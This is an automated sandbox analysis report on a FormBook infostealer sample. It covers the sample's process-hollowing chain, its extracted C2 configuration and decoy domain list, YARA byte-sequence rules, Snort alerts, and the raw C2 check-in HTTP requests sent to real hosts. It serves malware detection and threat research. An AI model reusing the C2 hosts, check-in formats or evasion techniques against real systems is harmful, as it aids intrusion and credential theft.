Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report NdBLyH2h5d.exe

Overview

General Information

Sample Name:NdBLyH2h5d.exe
Analysis ID:385309
MD5:3fef6985af0d52ab6701df170096b504
SHA1:ac8db3220c960262f8e666eae676066cec541b3a
SHA256:a9c3d37d324e9b6a0ebf9f9369c68cc288117edc4657d086b0fbc0cbafee9e64
Tags:exe
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Contains functionality to prevent local Windows debugging
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • NdBLyH2h5d.exe (PID: 5612 cmdline: 'C:\Users\user\Desktop\NdBLyH2h5d.exe' MD5: 3FEF6985AF0D52AB6701DF170096B504)
    • NdBLyH2h5d.exe (PID: 6140 cmdline: 'C:\Users\user\Desktop\NdBLyH2h5d.exe' MD5: 3FEF6985AF0D52AB6701DF170096B504)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • rundll32.exe (PID: 6048 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
          • cmd.exe (PID: 4228 cmdline: /c del 'C:\Users\user\Desktop\NdBLyH2h5d.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.montcoimmigrationlawyer.com/uoe8/"], "decoy": ["chalance.design", "certifiedlaywernj.com", "bsbgraphic.com", "caeka.com", "zagorafinancial.com", "cvingenieriacivil.net", "mojilifenoosa.com", "bucktheherd.net", "sparkmonic.com", "catherineandwilson.com", "cdefenders.com", "intersp.net", "santoriniimpressivetours.net", "arkansaspaymentrelief.com", "tewab.com", "bjzjgjg.com", "michgoliki.com", "oallahplease.com", "plaisterpress.com", "redyroblx.com", "funnyfootballmugs.com", "borderlesstrade.info", "partequity.net", "3992199.com", "bestcoloncleanseblog.com", "online-legalservices.com", "fibermover.com", "magen-tracks.xyz", "hotelsinshirdimkm.com", "beachjunction.com", "lanren.plus", "nouvellecartebancaire.com", "thegiftsofdepression.com", "metabol.parts", "dvxdkrbll.icu", "flsprayer.com", "przyczepy.net", "cantinhosdeaparecida.com", "californiasecuritycamera.com", "nevadasmallbusinessattorney.com", "skipperdaily.com", "missjeschickt.com", "rocketmortgageshady.net", "upholsteredwineracks.com", "best20singles.com", "fsquanyi.com", "ronlinebiz.com", "gaelmobilecarwash.com", "commercials.pro", "bl927.com", "workforceuae.com", "innercritictypes.com", "unipacksexpress.com", "chaitanya99.com", "rangamaty.com", "7chd.com", "keydefi.com", "liveporn.wiki", "carajedellcasting.com", "gooddoggymedia.com", "boldercoolware.com", "hispekdiamond.com", "expnashvilletn.com", "swashbug.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166a9:$sqlite3step: 68 34 1C 7B E1
    • 0x167bc:$sqlite3step: 68 34 1C 7B E1
    • 0x166d8:$sqlite3text: 68 38 2A 90 C5
    • 0x167fd:$sqlite3text: 68 38 2A 90 C5
    • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
    00000001.00000002.252981265.0000000000D10000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000001.00000002.252981265.0000000000D10000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.2.NdBLyH2h5d.exe.2640000.2.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        0.2.NdBLyH2h5d.exe.2640000.2.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        0.2.NdBLyH2h5d.exe.2640000.2.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x166a9:$sqlite3step: 68 34 1C 7B E1
        • 0x167bc:$sqlite3step: 68 34 1C 7B E1
        • 0x166d8:$sqlite3text: 68 38 2A 90 C5
        • 0x167fd:$sqlite3text: 68 38 2A 90 C5
        • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
        1.2.NdBLyH2h5d.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.2.NdBLyH2h5d.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for URL or domainShow sources
          Source: http://www.7chd.com/uoe8/?Dnh8=pp2ekQWroypTFKaJa5Qkcd1bUyGAkfDbiqxtSX5G9L70Cmz7PeGJVxgmdicR3ONQ4/wh&pPB=K2MxltkHBDK4hDMpAvira URL Cloud: Label: malware
          Found malware configurationShow sources
          Source: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.montcoimmigrationlawyer.com/uoe8/"], "decoy": ["chalance.design", "certifiedlaywernj.com", "bsbgraphic.com", "caeka.com", "zagorafinancial.com", "cvingenieriacivil.net", "mojilifenoosa.com", "bucktheherd.net", "sparkmonic.com", "catherineandwilson.com", "cdefenders.com", "intersp.net", "santoriniimpressivetours.net", "arkansaspaymentrelief.com", "tewab.com", "bjzjgjg.com", "michgoliki.com", "oallahplease.com", "plaisterpress.com", "redyroblx.com", "funnyfootballmugs.com", "borderlesstrade.info", "partequity.net", "3992199.com", "bestcoloncleanseblog.com", "online-legalservices.com", "fibermover.com", "magen-tracks.xyz", "hotelsinshirdimkm.com", "beachjunction.com", "lanren.plus", "nouvellecartebancaire.com", "thegiftsofdepression.com", "metabol.parts", "dvxdkrbll.icu", "flsprayer.com", "przyczepy.net", "cantinhosdeaparecida.com", "californiasecuritycamera.com", "nevadasmallbusinessattorney.com", "skipperdaily.com", "missjeschickt.com", "rocketmortgageshady.net", "upholsteredwineracks.com", "best20singles.com", "fsquanyi.com", "ronlinebiz.com", "gaelmobilecarwash.com", "commercials.pro", "bl927.com", "workforceuae.com", "innercritictypes.com", "unipacksexpress.com", "chaitanya99.com", "rangamaty.com", "7chd.com", "keydefi.com", "liveporn.wiki", "carajedellcasting.com", "gooddoggymedia.com", "boldercoolware.com", "hispekdiamond.com", "expnashvilletn.com", "swashbug.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: NdBLyH2h5d.exeVirustotal: Detection: 20%Perma Link
          Source: NdBLyH2h5d.exeReversingLabs: Detection: 29%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.252981265.0000000000D10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.216382055.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.479518416.0000000002BD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.477763536.00000000003B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.220737400.0000000002640000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.251780001.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.250995157.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.NdBLyH2h5d.exe.2640000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.NdBLyH2h5d.exe.2640000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: 6.2.rundll32.exe.4d44f8.2.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.2.NdBLyH2h5d.exe.2640000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.NdBLyH2h5d.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.1.NdBLyH2h5d.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 6.2.rundll32.exe.4b17960.5.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: NdBLyH2h5d.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: wntdll.pdbUGP source: NdBLyH2h5d.exe, 00000000.00000003.216210756.000000001EFE0000.00000004.00000001.sdmp, NdBLyH2h5d.exe, 00000001.00000002.252496199.0000000000AFF000.00000040.00000001.sdmp, rundll32.exe, 00000006.00000002.481925699.00000000046FF000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: NdBLyH2h5d.exe, rundll32.exe
          Source: Binary string: rundll32.pdb source: NdBLyH2h5d.exe, 00000001.00000002.253158543.0000000002640000.00000040.00000001.sdmp
          Source: Binary string: rundll32.pdbGCTL source: NdBLyH2h5d.exe, 00000001.00000002.253158543.0000000002640000.00000040.00000001.sdmp
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 0_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 0_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 0_2_004026BC FindFirstFileA,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 4x nop then pop ebx
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 4x nop then pop edi
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 4x nop then pop ebx
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then pop edi

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49713 -> 52.15.160.167:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49713 -> 52.15.160.167:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49713 -> 52.15.160.167:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49718 -> 213.171.195.105:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49718 -> 213.171.195.105:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49718 -> 213.171.195.105:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49725 -> 23.227.38.74:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49725 -> 23.227.38.74:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49725 -> 23.227.38.74:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49733 -> 184.168.131.241:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49733 -> 184.168.131.241:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49733 -> 184.168.131.241:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49735 -> 104.21.24.135:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49735 -> 104.21.24.135:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49735 -> 104.21.24.135:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.montcoimmigrationlawyer.com/uoe8/
          Source: global trafficHTTP traffic detected: GET /uoe8/?Dnh8=6wr609Vx9lIYE8xJyDK49BerhrrLsGkNJqd9AfCiKUtPUCt4zBl+uaOpo8ym8tjcWxTe&pPB=K2MxltkHBDK4hDMp HTTP/1.1Host: www.fibermover.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uoe8/?Dnh8=CVv7qMV6HbciCWFzqhUZZAQ0US+YdWqRbJ1eYpd5+PQQEEyRiYk8iw/aqhx7FohNRjRK&pPB=K2MxltkHBDK4hDMp HTTP/1.1Host: www.mojilifenoosa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uoe8/?Dnh8=pp2ekQWroypTFKaJa5Qkcd1bUyGAkfDbiqxtSX5G9L70Cmz7PeGJVxgmdicR3ONQ4/wh&pPB=K2MxltkHBDK4hDMp HTTP/1.1Host: www.7chd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uoe8/?Dnh8=UhlVi8jLiQUXpO3Mm3lJbnFIbsRb97T5i2flOgFV3YbeH0Xk3z/nbJUyPEwPPltkxnEn&pPB=K2MxltkHBDK4hDMp HTTP/1.1Host: www.hispekdiamond.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uoe8/?Dnh8=jbWl/12JT1iDRb0v1vq5On9CelmHmR3hJr6gjt0xDgcmriA4IMeiSysiloI+majB4Luo&pPB=K2MxltkHBDK4hDMp HTTP/1.1Host: www.swashbug.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uoe8/?Dnh8=0AgkmMdb/xcAtot8xloO7jEL6e2GWsoAGGF4g5velsS4rIzaA3O5+OYWQMQKg8Hr7C9A&pPB=K2MxltkHBDK4hDMp HTTP/1.1Host: www.zagorafinancial.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uoe8/?Dnh8=oRF9sMnf9PdLhjUOIBAEDWVppNUvEE2O6ED6s7IbEJi5z3I9xavY20aFrDWDg7pV30V8&pPB=K2MxltkHBDK4hDMp HTTP/1.1Host: www.funnyfootballmugs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uoe8/?Dnh8=TYKQicIMvKRESm/flOMvKt3N/kbr0v+cwHo5PwIdzkllwLOIwmCeEw+gbEKOgk8UbATi&pPB=K2MxltkHBDK4hDMp HTTP/1.1Host: www.przyczepy.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uoe8/?Dnh8=h2lbrHqA/lU/5ydhtyDssHwS0ovAY6emeVgF9WK6HhWxxVaP+H0Yfne8Qd/1EA4oYSoB&pPB=K2MxltkHBDK4hDMp HTTP/1.1Host: www.3992199.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uoe8/?Dnh8=DVW7OxuTiipzhEotDzIJzGfsiMq3vXOqW3PM8kZWjghPJAmdu1p3BOMI8OM6bfwnU86n&pPB=K2MxltkHBDK4hDMp HTTP/1.1Host: www.montcoimmigrationlawyer.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uoe8/?Dnh8=4x9Go+G4sQK1bPcn4vkzPWadXV0GNuVhhd/eQWnbDPmuQCX7Nztt7R8hTxXUs1RW0ALQ&pPB=K2MxltkHBDK4hDMp HTTP/1.1Host: www.missjeschickt.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uoe8/?Dnh8=6wr609Vx9lIYE8xJyDK49BerhrrLsGkNJqd9AfCiKUtPUCt4zBl+uaOpo8ym8tjcWxTe&pPB=K2MxltkHBDK4hDMp HTTP/1.1Host: www.fibermover.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 45.142.156.44 45.142.156.44
          Source: Joe Sandbox ViewIP Address: 23.227.38.74 23.227.38.74
          Source: Joe Sandbox ViewASN Name: CNSERVERSUS CNSERVERSUS
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
          Source: global trafficHTTP traffic detected: GET /uoe8/?Dnh8=6wr609Vx9lIYE8xJyDK49BerhrrLsGkNJqd9AfCiKUtPUCt4zBl+uaOpo8ym8tjcWxTe&pPB=K2MxltkHBDK4hDMp HTTP/1.1Host: www.fibermover.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uoe8/?Dnh8=CVv7qMV6HbciCWFzqhUZZAQ0US+YdWqRbJ1eYpd5+PQQEEyRiYk8iw/aqhx7FohNRjRK&pPB=K2MxltkHBDK4hDMp HTTP/1.1Host: www.mojilifenoosa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uoe8/?Dnh8=pp2ekQWroypTFKaJa5Qkcd1bUyGAkfDbiqxtSX5G9L70Cmz7PeGJVxgmdicR3ONQ4/wh&pPB=K2MxltkHBDK4hDMp HTTP/1.1Host: www.7chd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uoe8/?Dnh8=UhlVi8jLiQUXpO3Mm3lJbnFIbsRb97T5i2flOgFV3YbeH0Xk3z/nbJUyPEwPPltkxnEn&pPB=K2MxltkHBDK4hDMp HTTP/1.1Host: www.hispekdiamond.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uoe8/?Dnh8=jbWl/12JT1iDRb0v1vq5On9CelmHmR3hJr6gjt0xDgcmriA4IMeiSysiloI+majB4Luo&pPB=K2MxltkHBDK4hDMp HTTP/1.1Host: www.swashbug.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uoe8/?Dnh8=0AgkmMdb/xcAtot8xloO7jEL6e2GWsoAGGF4g5velsS4rIzaA3O5+OYWQMQKg8Hr7C9A&pPB=K2MxltkHBDK4hDMp HTTP/1.1Host: www.zagorafinancial.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uoe8/?Dnh8=oRF9sMnf9PdLhjUOIBAEDWVppNUvEE2O6ED6s7IbEJi5z3I9xavY20aFrDWDg7pV30V8&pPB=K2MxltkHBDK4hDMp HTTP/1.1Host: www.funnyfootballmugs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uoe8/?Dnh8=TYKQicIMvKRESm/flOMvKt3N/kbr0v+cwHo5PwIdzkllwLOIwmCeEw+gbEKOgk8UbATi&pPB=K2MxltkHBDK4hDMp HTTP/1.1Host: www.przyczepy.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uoe8/?Dnh8=h2lbrHqA/lU/5ydhtyDssHwS0ovAY6emeVgF9WK6HhWxxVaP+H0Yfne8Qd/1EA4oYSoB&pPB=K2MxltkHBDK4hDMp HTTP/1.1Host: www.3992199.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uoe8/?Dnh8=DVW7OxuTiipzhEotDzIJzGfsiMq3vXOqW3PM8kZWjghPJAmdu1p3BOMI8OM6bfwnU86n&pPB=K2MxltkHBDK4hDMp HTTP/1.1Host: www.montcoimmigrationlawyer.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uoe8/?Dnh8=4x9Go+G4sQK1bPcn4vkzPWadXV0GNuVhhd/eQWnbDPmuQCX7Nztt7R8hTxXUs1RW0ALQ&pPB=K2MxltkHBDK4hDMp HTTP/1.1Host: www.missjeschickt.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uoe8/?Dnh8=6wr609Vx9lIYE8xJyDK49BerhrrLsGkNJqd9AfCiKUtPUCt4zBl+uaOpo8ym8tjcWxTe&pPB=K2MxltkHBDK4hDMp HTTP/1.1Host: www.fibermover.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.fibermover.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 12 Apr 2021 08:06:24 GMTContent-Type: text/htmlContent-Length: 153Connection: closeServer: nginx/1.16.1Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>
          Source: explorer.exe, 00000004.00000000.237810152.000000000F675000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
